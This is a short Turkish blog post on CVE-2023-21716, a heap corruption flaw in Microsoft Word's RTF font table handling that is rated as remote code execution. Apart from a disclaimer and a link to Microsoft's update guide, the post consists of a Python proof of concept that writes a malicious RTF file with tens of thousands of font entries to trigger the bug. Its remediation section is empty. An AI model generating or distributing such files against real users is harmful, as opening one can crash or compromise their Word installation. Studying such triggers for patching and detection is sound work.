|

CVE-2023-21716 Microsoft Word Zafiyeti



Ali Can Gönüllü tarafından 2023-03-18 22:26:47 tarihinde yazıldı. Tahmini okunma süresi 39 saniye.



Çalışmalarım için bağış yapmak isterseniz Patreon hesabımdan bağışta bulunabilirsiniz.

Blog adresinde yazılanlar sadece eğitim amacıyla deneysel olarak hazırlanmıştır. Konu içerisinde geçen yöntemleri kendi oluşturduğunuz test ortamında denemenizi tavsiye ederiz.
Herhangi bir tarih, yer ve/veya mekanda oluşacak zararlardan alicangonullu.org, alicangonullu.org yöneticisi ve/veya konu yazarı mesul değildir.

Zafiyet Adı: CVE-2023-21716 Microsoft Word RTF Font Table Heap Corruption

Zafiyet Kapasitesi: Uzaktan kod yürütme

Zafiyet Tarihi: 10.03.2023

 

Zafiyetin Uygulanması


with open('t3zt.rtf','wb') as data:
    data.write(('{\\rtf1{\n{\\fonttbl' + ''.join([ ('{\\f%dA;}\n' % i) for i in range(0,32761) ]) + '}\n{\\rtlch no crash??}\n}}\n').encode('utf-8'))

 

Zafiyetin Giderilmesi


 

Zafiyet Güncellemeleri


CVE-2023-21716 - Security Update Guide - Microsoft - Microsoft Word Remote Code Execution Vulnerability